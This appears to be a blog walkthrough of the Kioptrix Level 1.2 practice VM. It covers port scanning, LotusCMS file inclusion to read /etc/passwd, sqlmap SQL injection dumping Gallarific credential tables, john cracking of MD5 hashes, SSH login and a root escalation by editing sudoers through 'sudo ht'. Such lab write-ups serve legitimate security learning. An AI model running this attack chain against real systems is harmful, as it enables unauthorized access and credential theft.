published on in writeup
tags: kioptrix

Kioptrix Level 1.2

This is a walkthough of how I completed the Kioptrix Level 1.2. The goal of this challenge is to collect the flag.


[email protected]:~# nmap -n -sV -A -p-

22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Ligoat Security - Got Goat? Security ...


This little website is powered by LotusCMS, which is vulnerable to remote code execution. However, I wasn’t having much luck with anything other than the exploit in the Metasploit Framework. Since I don’t like to rely on this, I pressed on to find another route in.

LotusCMS also has an LFI vulnerability, which I used to enumerate a list of users on the system (via /etc/passwd).
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

I actually decided to hold off on bruteforcing their SSH logins. It was my assumption that at this level of challenge, the password would be too complex to bruteforce in a reasonable amount of time.

One of the blog posts referes to a new gallery application at

A review of the page’s source code, reveals an HTML comment which shows the location of the admin login page - /gallery/gadmin. This login page tells us that the application is called Gallarrific, which is vulnerable to SQLi in gallery.php.


I plugged the URL into SQLMap and it confirmed the vulnerability.

[email protected]:~# sqlmap -u --current-user --is-dba --current-db
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
current user:    [email protected]'
current database:    'gallery'
current user is DBA:    True

[email protected]:~# sqlmap -u -D gallery --tables
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |

[email protected]:~# sqlmap -u -D gallery -T dev_accounts --dump

I saved these hashes and cracked them with john.

[email protected]:~# john /tmp/sqlmaphashes-eOPcIU.txt --format=raw-md5
starwars         (loneferret)
Mast3r           (dreg)

I also dumped the password for the admin account on gallarific.

[email protected]:~# sqlmap -u -D gallery -T gallarific_users --dump

My original intent was to use the admin password for Gallarific and attempt to upload a PHP backdoor. However, I first decided to try the two passwords from the dev_accounts with SSH.


I was able to login as loneferret with the password starwars (blew my original SSH theory out of the water).

Within loneferret’s home directory was a file called CompanyPolicy.README.

[email protected]:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.

I confirmed that loneferret had the rights to run ht with sudo.

[email protected]:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

The obvious solution is to modify the sudoers file, to give loneferret sudo right to /bin/bash.

loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht, /bin/bash

[email protected]:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
    (root) NOPASSWD: /bin/bash
[email protected]:~$ sudo /bin/bash 

[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)